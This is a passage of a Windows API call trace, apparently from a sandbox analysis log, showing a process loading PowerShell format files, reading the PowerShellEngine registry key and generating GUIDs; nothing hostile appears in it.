	[0546.339] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0xe67, lpOverlapped=0x0) returned 1
	[0546.339] ReadFile (in: hFile=0x324, lpBuffer=0x2ebc177, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebc177*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0546.339] ReadFile (in: hFile=0x324, lpBuffer=0x2ebcba8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x2ebcba8*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0546.339] CloseHandle (hObject=0x324) returned 1
	[0546.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0546.340] SetErrorMode (uMode=0x1) returned 0x1
	[0546.340] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0546.340] SetErrorMode (uMode=0x1) returned 0x1
	[0546.340] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0546.340] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x324) returned 0x0
	[0546.340] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0546.340] CoTaskMemAlloc (cb=0x5a) returned 0x3f9870
	[0546.340] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x3f9870, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0546.341] CoTaskMemFree (pv=0x3f9870) 
	[0546.341] RegCloseKey (hKey=0x324) returned 0x0
	[0546.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0546.341] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0546.342] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xb6e6365, Data2=0x35c, Data3=0x4401, Data4=([0]=0x98, [1]=0xd1, [2]=0x35, [3]=0x47, [4]=0xa2, [5]=0xa4, [6]=0x85, [7]=0x83))) returned 0x0
	[0546.343] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x6835cc57, Data2=0x2433, Data3=0x40f9, Data4=([0]=0xb4, [1]=0xb0, [2]=0xd5, [3]=0xa7, [4]=0x55, [5]=0x3f, [6]=0xf3, [7]=0xbb))) returned 0x0
	[0546.344] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xd1669ce4, Data2=0x8121, Data3=0x4d44, Data4=([0]=0x8d, [1]=0x6f, [2]=0x9a, [3]=0x63, [4]=0xf8, [5]=0xd1, [6]=0xb, [7]=0x9b))) returned 0x0
	[0546.344] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x22388508, Data2=0x746e, Data3=0x4aa6, Data4=([0]=0xa9, [1]=0x41, [2]=0x54, [3]=0x16, [4]=0xce, [5]=0x9, [6]=0x5d, [7]=0x68))) returned 0x0
	[0546.345] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x51d51402, Data2=0x2bda, Data3=0x467d, Data4=([0]=0xb7, [1]=0xa2, [2]=0xf6, [3]=0x3f, [4]=0x9f, [5]=0xc2, [6]=0xd6, [7]=0xe5))) returned 0x0
	[0546.345] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xa982c213, Data2=0x9904, Data3=0x4b1e, Data4=([0]=0x96, [1]=0xe7, [2]=0xaa, [3]=0xf0, [4]=0x60, [5]=0xe1, [6]=0x26, [7]=0x40))) returned 0x0
	[0546.346] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xbb28fd94, Data2=0xccf6, Data3=0x45f3, Data4=([0]=0xa3, [1]=0x7b, [2]=0xdb, [3]=0x19, [4]=0xd, [5]=0xa5, [6]=0xea, [7]=0xad))) returned 0x0
	[0546.346] VirtualQuery (in: lpAddress=0x1cbe20, lpBuffer=0x1ccce0, dwLength=0x30 | out: lpBuffer=0x1ccce0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0546.347] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x55b98a3a, Data2=0x93b1, Data3=0x4495, Data4=([0]=0x95, [1]=0xf5, [2]=0x42, [3]=0xf3, [4]=0x38, [5]=0xa3, [6]=0xa3, [7]=0x9f))) returned 0x0
	[0546.348] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x7248ae4a, Data2=0x8c6, Data3=0x4039, Data4=([0]=0x88, [1]=0x8d, [2]=0xaf, [3]=0xdf, [4]=0x3f, [5]=0x20, [6]=0x2a, [7]=0xe7))) returned 0x0
	[0546.348] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1f67f0fd, Data2=0x9233, Data3=0x4541, Data4=([0]=0x88, [1]=0xc5, [2]=0x39, [3]=0xcd, [4]=0x14, [5]=0x77, [6]=0x94, [7]=0x18))) returned 0x0
	[0546.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x892d9fb3, Data2=0x491f, Data3=0x4f82, Data4=([0]=0x9c, [1]=0xe1, [2]=0x57, [3]=0x90, [4]=0xf6, [5]=0xe4, [6]=0x92, [7]=0xe4))) returned 0x0
	[0546.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x9eed317f, Data2=0x3e5c, Data3=0x4cb8, Data4=([0]=0xb4, [1]=0x8d, [2]=0x5a, [3]=0xf8, [4]=0x1b, [5]=0x39, [6]=0x71, [7]=0x34))) returned 0x0
	[0546.349] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xf5632497, Data2=0x6fa8, Data3=0x4697, Data4=([0]=0x83, [1]=0x25, [2]=0x58, [3]=0x49, [4]=0xe, [5]=0xc3, [6]=0x5d, [7]=0x92))) returned 0x0
	[0546.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x35e84bd9, Data2=0xed0, Data3=0x40cc, Data4=([0]=0x95, [1]=0xa, [2]=0x11, [3]=0xf8, [4]=0x41, [5]=0x47, [6]=0xc4, [7]=0x2c))) returned 0x0
	[0546.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xa0bc1cf5, Data2=0x7600, Data3=0x43a5, Data4=([0]=0xa0, [1]=0xb6, [2]=0xd0, [3]=0xc4, [4]=0x32, [5]=0x44, [6]=0xed, [7]=0x35))) returned 0x0
	[0546.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1de6188c, Data2=0x41f4, Data3=0x4b50, Data4=([0]=0x8a, [1]=0x37, [2]=0x1e, [3]=0x79, [4]=0x14, [5]=0xe5, [6]=0xd2, [7]=0xe7))) returned 0x0
	[0546.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xb69cd7d6, Data2=0xcf42, Data3=0x49e1, Data4=([0]=0xb7, [1]=0xd, [2]=0x30, [3]=0x3f, [4]=0xef, [5]=0xe4, [6]=0xa4, [7]=0x3d))) returned 0x0
	[0546.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x55b0eb83, Data2=0x79d2, Data3=0x4cb5, Data4=([0]=0x9f, [1]=0xe4, [2]=0x1e, [3]=0x22, [4]=0x54, [5]=0x2f, [6]=0x68, [7]=0x81))) returned 0x0
	[0546.350] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xfaef135d, Data2=0x7438, Data3=0x448f, Data4=([0]=0x9d, [1]=0xf, [2]=0xd5, [3]=0x5d, [4]=0x94, [5]=0xbb, [6]=0x4d, [7]=0x71))) returned 0x0
	[0546.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x264eafad, Data2=0xbb75, Data3=0x4442, Data4=([0]=0x88, [1]=0xaf, [2]=0x24, [3]=0xa2, [4]=0x87, [5]=0xad, [6]=0x21, [7]=0x7f))) returned 0x0
	[0546.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x9a0d87f9, Data2=0xc1e3, Data3=0x42a3, Data4=([0]=0xac, [1]=0xbd, [2]=0xc8, [3]=0x43, [4]=0xbb, [5]=0x1d, [6]=0x20, [7]=0xb0))) returned 0x0
	[0546.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x664c5b65, Data2=0x12eb, Data3=0x4f72, Data4=([0]=0xb6, [1]=0x65, [2]=0xd2, [3]=0xc5, [4]=0x4, [5]=0x7c, [6]=0xc7, [7]=0xfd))) returned 0x0
	[0546.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x67568907, Data2=0x1059, Data3=0x4dc6, Data4=([0]=0xaf, [1]=0x9d, [2]=0x98, [3]=0x41, [4]=0x9f, [5]=0xd9, [6]=0x6f, [7]=0x2e))) returned 0x0
	[0546.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x57a69319, Data2=0x862f, Data3=0x4b78, Data4=([0]=0x99, [1]=0xf6, [2]=0x29, [3]=0x51, [4]=0x84, [5]=0xff, [6]=0x73, [7]=0x7e))) returned 0x0
	[0546.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x7cd1a13d, Data2=0x1cdd, Data3=0x4047, Data4=([0]=0xa8, [1]=0x6e, [2]=0x18, [3]=0x81, [4]=0x3d, [5]=0x29, [6]=0x98, [7]=0x75))) returned 0x0
	[0546.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xa86efc88, Data2=0x644e, Data3=0x4c1a, Data4=([0]=0xbd, [1]=0x3e, [2]=0xff, [3]=0xa6, [4]=0xf1, [5]=0xfa, [6]=0xdc, [7]=0x94))) returned 0x0
	[0546.351] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xd2887b6, Data2=0x85ce, Data3=0x4b42, Data4=([0]=0xb4, [1]=0x99, [2]=0x88, [3]=0x6f, [4]=0xe7, [5]=0x98, [6]=0xe2, [7]=0x42))) returned 0x0
	[0546.352] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x9b8d8851, Data2=0x9f58, Data3=0x4c62, Data4=([0]=0xa2, [1]=0x6f, [2]=0x3a, [3]=0x56, [4]=0x28, [5]=0x57, [6]=0x91, [7]=0xb))) returned 0x0
	[0546.352] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xba5a920a, Data2=0xf30c, Data3=0x4c0f, Data4=([0]=0xab, [1]=0x40, [2]=0x6f, [3]=0x87, [4]=0xb4, [5]=0x49, [6]=0xbf, [7]=0xc7))) returned 0x0
	[0546.352] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xe89aa3ce, Data2=0xea6, Data3=0x4db7, Data4=([0]=0x86, [1]=0x6c, [2]=0x78, [3]=0x75, [4]=0x37, [5]=0xfd, [6]=0xc3, [7]=0xe8))) returned 0x0
	[0546.352] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xce38be39, Data2=0x3517, Data3=0x4c45, Data4=([0]=0x99, [1]=0xfc, [2]=0x50, [3]=0xd8, [4]=0x84, [5]=0xae, [6]=0xbf, [7]=0xa4))) returned 0x0
	[0546.352] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xfb030087, Data2=0x4c14, Data3=0x47c1, Data4=([0]=0x89, [1]=0x86, [2]=0x4f, [3]=0xfa, [4]=0xd7, [5]=0xd4, [6]=0x23, [7]=0xa4))) returned 0x0
	[0546.352] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xc9d3d28b, Data2=0x6e15, Data3=0x4892, Data4=([0]=0x9d, [1]=0x6a, [2]=0x55, [3]=0xb3, [4]=0xd0, [5]=0xc8, [6]=0xbb, [7]=0x12))) returned 0x0
	[0546.354] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1a6c3380, Data2=0x8bd8, Data3=0x471f, Data4=([0]=0xbc, [1]=0x37, [2]=0xa9, [3]=0x26, [4]=0x4d, [5]=0x6e, [6]=0x1c, [7]=0x49))) returned 0x0
	[0546.354] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x6dc04936, Data2=0x36d6, Data3=0x4d91, Data4=([0]=0x9b, [1]=0xcc, [2]=0x81, [3]=0xac, [4]=0xb8, [5]=0xaf, [6]=0xc8, [7]=0xa3))) returned 0x0
	[0546.354] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x1880c4e5, Data2=0x1cae, Data3=0x4248, Data4=([0]=0xb7, [1]=0x2b, [2]=0xa7, [3]=0xda, [4]=0xf9, [5]=0x29, [6]=0x2a, [7]=0x84))) returned 0x0
	[0546.354] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x8dc51694, Data2=0x60b4, Data3=0x47c6, Data4=([0]=0xa4, [1]=0x5, [2]=0x2a, [3]=0xb1, [4]=0xe, [5]=0x12, [6]=0x7a, [7]=0xaf))) returned 0x0
	[0546.354] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x7143ff4a, Data2=0x572b, Data3=0x4cc4, Data4=([0]=0xb4, [1]=0xf, [2]=0xe, [3]=0x1d, [4]=0x1a, [5]=0x6a, [6]=0x98, [7]=0xb2))) returned 0x0
	[0546.354] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x9c823928, Data2=0x5d6d, Data3=0x47ff, Data4=([0]=0x93, [1]=0x79, [2]=0xd6, [3]=0xcb, [4]=0x45, [5]=0xce, [6]=0xa8, [7]=0xe7))) returned 0x0
	[0546.354] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x36c6c006, Data2=0xa3f4, Data3=0x4d76, Data4=([0]=0x9a, [1]=0xec, [2]=0xa5, [3]=0x1, [4]=0x18, [5]=0xae, [6]=0x38, [7]=0xc2))) returned 0x0
	[0546.355] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x73ee4ccf, Data2=0x9a7c, Data3=0x4799, Data4=([0]=0x8b, [1]=0xe7, [2]=0x95, [3]=0x6e, [4]=0xa, [5]=0xcc, [6]=0xa3, [7]=0x85))) returned 0x0
	[0546.355] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xc71c5b5a, Data2=0x49a3, Data3=0x4bfa, Data4=([0]=0xb1, [1]=0xf3, [2]=0xc6, [3]=0x66, [4]=0xe0, [5]=0xc3, [6]=0xb4, [7]=0x6))) returned 0x0
	[0546.355] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x283d6de8, Data2=0xc67e, Data3=0x4546, Data4=([0]=0x87, [1]=0x5d, [2]=0x8a, [3]=0x57, [4]=0xa7, [5]=0x87, [6]=0x68, [7]=0x6b))) returned 0x0
	[0546.355] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xa22bbcf2, Data2=0x6f78, Data3=0x40bd, Data4=([0]=0x93, [1]=0x42, [2]=0xfc, [3]=0x87, [4]=0xd3, [5]=0xd, [6]=0xf8, [7]=0x56))) returned 0x0
	[0546.355] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xc58e830e, Data2=0xad72, Data3=0x43d1, Data4=([0]=0xb8, [1]=0x42, [2]=0xe1, [3]=0xea, [4]=0xaf, [5]=0x2f, [6]=0x3d, [7]=0x55))) returned 0x0
	[0546.355] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x8cf1f8e4, Data2=0xacfb, Data3=0x422a, Data4=([0]=0xb5, [1]=0x75, [2]=0xe1, [3]=0x79, [4]=0x41, [5]=0x9, [6]=0x4f, [7]=0x25))) returned 0x0
	[0546.356] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x4a1ddc0, Data2=0x7ab1, Data3=0x44dd, Data4=([0]=0x87, [1]=0xf7, [2]=0x40, [3]=0x41, [4]=0xda, [5]=0x95, [6]=0x33, [7]=0x74))) returned 0x0
	[0546.356] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x3ac481ac, Data2=0x340f, Data3=0x4922, Data4=([0]=0xa7, [1]=0xab, [2]=0x17, [3]=0xa0, [4]=0x86, [5]=0x12, [6]=0xc7, [7]=0xf1))) returned 0x0
	[0546.356] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0546.356] GetFileType (hFile=0x324) returned 0x1
	[0546.356] SetErrorMode (uMode=0x1) returned 0x1
	[0546.356] GetFileType (hFile=0x324) returned 0x1
	[0546.356] ReadFile (in: hFile=0x324, lpBuffer=0x301ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x301ab40*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.357] ReadFile (in: hFile=0x324, lpBuffer=0x301ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x301ab40*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.357] ReadFile (in: hFile=0x324, lpBuffer=0x301ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x301ab40*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.358] ReadFile (in: hFile=0x324, lpBuffer=0x301ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x301ab40*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0546.358] ReadFile (in: hFile=0x324, lpBuffer=0x301ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x301ab40*, lpNumberOfBytesRead=0x1cd1b8*=0x8b4, lpOverlapped=0x0) returned 1
	[0546.358] ReadFile (in: hFile=0x324, lpBuffer=0x3019f5c, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3019f5c*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0546.358] ReadFile (in: hFile=0x324, lpBuffer=0x301ab40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x301ab40*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0546.358] CloseHandle (hObject=0x324) returned 1
	[0546.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0546.359] SetErrorMode (uMode=0x1) returned 0x1
	[0546.359] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0546.359] SetErrorMode (uMode=0x1) returned 0x1
	[0546.359] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0546.359] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x324) returned 0x0
	[0546.359] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0546.359] CoTaskMemAlloc (cb=0x5a) returned 0x3f9870
	[0546.359] RegQueryValueExW (in: hKey=0x324, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x3f9870, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0546.359] CoTaskMemFree (pv=0x3f9870) 
	[0546.360] RegCloseKey (hKey=0x324) returned 0x0
	[0546.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0546.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0546.360] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x9d7b1278, Data2=0xa29b, Data3=0x4420, Data4=([0]=0x8f, [1]=0x57, [2]=0x22, [3]=0x7f, [4]=0xd1, [5]=0xde, [6]=0xc8, [7]=0xd0))) returned 0x0
	[0546.360] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x8e4a2c93, Data2=0x41b5, Data3=0x4203, Data4=([0]=0x8c, [1]=0xb6, [2]=0x53, [3]=0xc3, [4]=0x93, [5]=0x6, [6]=0x97, [7]=0x3e))) returned 0x0
	[0546.361] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0546.361] GetFileType (hFile=0x324) returned 0x1
	[0546.361] SetErrorMode (uMode=0x1) returned 0x1
	[0546.361] GetFileType (hFile=0x324) returned 0x1
	[0546.361] ReadFile (in: hFile=0x324, lpBuffer=0x3058928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3058928*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0547.196] ReadFile (in: hFile=0x324, lpBuffer=0x3058928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3058928*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0547.196] ReadFile (in: hFile=0x324, lpBuffer=0x3058928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3058928*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0547.196] ReadFile (in: hFile=0x324, lpBuffer=0x3058928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3058928*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0547.196] ReadFile (in: hFile=0x324, lpBuffer=0x3058928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3058928*, lpNumberOfBytesRead=0x1cd1b8*=0xe98, lpOverlapped=0x0) returned 1
	[0547.197] ReadFile (in: hFile=0x324, lpBuffer=0x3057f28, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3057f28*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0547.197] ReadFile (in: hFile=0x324, lpBuffer=0x3058928, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3058928*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0547.197] CloseHandle (hObject=0x324) returned 1
	[0547.197] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0547.197] SetErrorMode (uMode=0x1) returned 0x1
